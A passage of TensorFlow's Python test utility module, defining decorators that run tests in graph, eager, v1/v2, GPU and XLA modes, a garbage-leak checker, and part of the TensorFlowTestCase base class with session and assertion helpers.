# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
